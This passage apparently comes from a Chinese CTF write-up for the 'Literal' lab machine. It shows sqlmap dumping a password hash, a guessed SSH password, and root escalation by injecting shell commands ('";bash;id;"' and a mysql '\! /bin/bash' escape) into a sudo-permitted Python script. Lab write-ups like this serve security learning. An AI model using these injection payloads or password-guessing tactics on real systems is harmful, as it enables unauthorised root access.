+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+
| 1  | carlos@forumtesting.literal.htb | 2022-02-12 | 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99 | carlos   |
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+

[13:47:11] [INFO] table 'forumtesting.forum_owner' dumped to CSV file '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv/dump/forumtesting/forum_owner.csv'
[13:47:11] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv'

[*] ending @ 13:47:11 /2025-06-08/

然后尝试破解:

image-20250609013013224

1
carlos:forum100889

但是登录失败了,这里作者意思是刚刚第二个sql注入界面是一个论坛,论坛名字为forumtesting,社会工程学来看他密码取为forum100889是因为对应着平台前五位以及数字,所以他的ssh密码可能为ssh100889,确实需要一点脑洞的。。。。

image-20250609013635976

提权

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
carlos@literal:~$ whoami;id
carlos
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos)
carlos@literal:~$ ls -la
total 44
drwxr-xr-x 7 carlos carlos 4096 Apr  8  2023 .
drwxr-xr-x 3 root   root   4096 Jun 15  2022 ..
lrwxrwxrwx 1 root   root      9 Feb 12  2021 .bash_history -> /dev/null
-rw-r--r-- 1 carlos carlos  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 carlos carlos 3771 Feb 25  2020 .bashrc
drwx------ 2 carlos carlos 4096 Jun 21  2022 .cache
drwx------ 3 carlos carlos 4096 Jun 22  2022 .gnupg
drwxrwxr-x 3 carlos carlos 4096 Feb 12  2021 .local
drwxrwxr-x 2 carlos carlos 4096 Jun 21  2022 my_things
-rw-r--r-- 1 carlos carlos  807 Feb 25  2020 .profile
drwx------ 2 carlos carlos 4096 Sep 20  2021 .ssh
-rw-r----- 1 root   carlos   33 Feb 13  2021 user.txt
carlos@literal:~$ cd my_things/
carlos@literal:~/my_things$ ls -la
total 12
drwxrwxr-x 2 carlos carlos 4096 Jun 21  2022 .
drwxr-xr-x 7 carlos carlos 4096 Apr  8  2023 ..
-rw-rw-r-- 1 carlos carlos  226 Jun  8 17:36 detalles.txt
carlos@literal:~/my_things$ cat detalles.txt 
To check one day.

Blog ----:
> Blog colors.
> Validate syntax and coherence.
> Buttom to translate blog to Spanish.
> Check task on both blog and forum.

Forum ---:
> Delete default posts.
> Create custom responses to mails.
carlos@literal:~/my_things$ crontab -l
no crontab for carlos
carlos@literal:~/my_things$ cd ..
carlos@literal:~$ cat user.txt 
6d3c8a6c73cf4f89eea7ae57f6eb9222
carlos@literal:~$ sudo -l
Matching Defaults entries for carlos on literal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User carlos may run the following commands on literal:
    (root) NOPASSWD: /opt/my_things/blog/update_project_status.py *

找到一个脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#!/usr/bin/python3

# Learning python3 to update my project status
## (mental note: This is important, so administrator is my safe to avoid upgrading records by mistake) :P

'''
References:
* MySQL commands in Linux: https://www.shellhacks.com/mysql-run-query-bash-script-linux-command-line/
* Shell commands in Python: https://stackabuse.com/executing-shell-commands-with-python/
* Functions: https://www.tutorialspoint.com/python3/python_functions.htm
* Arguments: https://www.knowledgehut.com/blog/programming/sys-argv-python-examples
* Array validation: https://stackoverflow.com/questions/7571635/fastest-way-to-check-if-a-value-exists-in-a-list
* Valid if root is running the script: https://stackoverflow.com/questions/2806897/what-is-the-best-way-for-checking-if-the-user-of-a-script-has-root-like-privileg
'''

import os
import sys
from datetime import date

# Functions ------------------------------------------------.
def execute_query(sql):
    os.system("mysql -u " + db_user + " -D " + db_name + " -e \"" + sql + "\"")

# Query all rows
def query_all():
    sql = "SELECT * FROM projects;"
    execute_query(sql)

# Query row by ID
def query_by_id(arg_project_id):
    sql = "SELECT * FROM projects WHERE proid = " + arg_project_id + ";"
    execute_query(sql)

# Update database
def update_status(enddate, arg_project_id, arg_project_status):
    if enddate != 0:
        sql = f"UPDATE projects SET prodateend = '" + str(enddate) + "', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"
    else:
        sql = f"UPDATE projects SET prodateend = '2222-12-12', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"

    execute_query(sql)

# Main program
def main():
    # Fast validation
    try:
        arg_project_id = sys.argv[1]
    except:
        arg_project_id = ""

    try:
        arg_project_status = sys.argv[2]
    except:
        arg_project_status = ""

    if arg_project_id and arg_project_status: # To update
        # Avoid update by error
        if os.geteuid() == 0:
            array_status = ["Done", "Doing", "To do"]
            if arg_project_status in array_status:
                print("[+] Before update project (" + arg_project_id + ")\n")
                query_by_id(arg_project_id)

                if arg_project_status == 'Done':
                    update_status(date.today(), arg_project_id, arg_project_status)
                else:
                    update_status(0, arg_project_id, arg_project_status)
            else:
                print("Bro, avoid a fail: Done - Doing - To do")
                exit(1)

            print("\n[+] New status of project (" + arg_project_id + ")\n")
            query_by_id(arg_project_id)
        else:
            print("Ejejeeey, avoid mistakes!")
            exit(1)

    elif arg_project_id:
        query_by_id(arg_project_id)
    else:
        query_all()

# Variables ------------------------------------------------.
db_user = "carlos"
db_name = "blog"

# Main program
main()

注意到execute_query直接执行拼接起来的命令,尝试闭合sql语句拼接进去尝试执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
carlos@literal:~$ /opt/my_things/blog/update_project_status.py
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
| proid | proname                                                      | prodatecreated      | prodateend | prostatus |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
|     1 | Ascii Art Python - ABCdario with colors                      | 2021-09-20 17:51:59 | 2021-09-20 | Done      |
|     2 | Ascii Art Python - Show logos only with letter A             | 2021-09-20 18:06:22 | 2222-12-12 | To do     |
|     3 | Ascii Art Bash - Show musical stores (WTF)                   | 2021-09-20 18:06:50 | 2222-12-12 | To do     |
|     4 | Forum - Add that people can send me bug reports of projects  | 2023-04-07 17:40:41 | 2023-11-01 | Doing     |
|     5 | Validate syntax errors on blog pages                         | 2021-09-20 18:07:43 | 2222-12-12 | Doing     |
|     6 | Script to extract info from files and upload it to any DB    | 2021-09-20 18:07:58 | 2222-12-12 | Doing     |
|     7 | Forum - Implement forum form                                 | 2023-04-07 17:46:38 | 2023-11-01 | Doing     |
|     8 | Add that people can create their own projects on DB          | 2021-09-20 18:49:52 | 2222-12-12 | To do     |
|     9 | Ascii Art C - Start learning Ascii Art with C                | 2021-09-20 18:50:02 | 2222-12-12 | To do     |
|    10 | Ascii Art Bash - Welcome banner preview in blog home         | 2021-09-20 18:50:08 | 2222-12-12 | To do     |
|    11 | Blog - Create login and register form                        | 2023-04-07 17:40:28 | 2023-08-21 | Done      |
|    12 | Blog - Improve the appearance of the dashboard/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing     |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
carlos@literal:~$ /opt/my_things/blog/update_project_status.py 1
+-------+-----------------------------------------+---------------------+------------+-----------+
| proid | proname                                 | prodatecreated      | prodateend | prostatus |
+-------+-----------------------------------------+---------------------+------------+-----------+
|     1 | Ascii Art Python - ABCdario with colors | 2021-09-20 17:51:59 | 2021-09-20 | Done      |
+-------+-----------------------------------------+---------------------+------------+-----------+
carlos@literal:~$ /opt/my_things/blog/update_project_status.py 12
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
| proid | proname                                                      | prodatecreated      | prodateend | prostatus |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
|    12 | Blog - Improve the appearance of the dashboard/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing     |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
carlos@literal:~$ /opt/my_things/blog/update_project_status.py '";whoami;id;"'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
carlos
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos)
sh: 1: ;: not found
carlos@literal:~$ sudo /opt/my_things/blog/update_project_status.py '";whoami;id;"'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
root
uid=0(root) gid=0(root) groups=0(root)
sh: 1: ;: not found

然后尝试sudo即可获取rootshell!

image-20250609015839187

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
carlos@literal:~$ sudo /opt/my_things/blog/update_project_status.py '";bash;id;"'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
root@literal:/home/carlos# cd ~
root@literal:~# ls -la
total 36
drwx------  5 root root 4096 Jun  8 15:20 .
drwxr-xr-x 20 root root 4096 Feb  7  2021 ..
lrwxrwxrwx  1 root root    9 Feb 12  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4096 Sep 18  2021 .cache
drwxr-xr-x  3 root root 4096 Feb 12  2021 .local
drwxr-xr-x  3 root root 4096 Jun 17  2022 my_things
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-------  1 root root   33 Feb 13  2021 root.txt
-rw-r--r--  1 root root   74 Sep 20  2021 .selected_editor
root@literal:~# cat root.txt
ca43cb966ef76475d9e0736feeb9f730

还看到有一种解法为:

1
sudo /opt/my_things/blog/update_project_status.py '\! /bin/bash' Done

也挺好!!!

本文由作者按照 CC BY 4.0 进行授权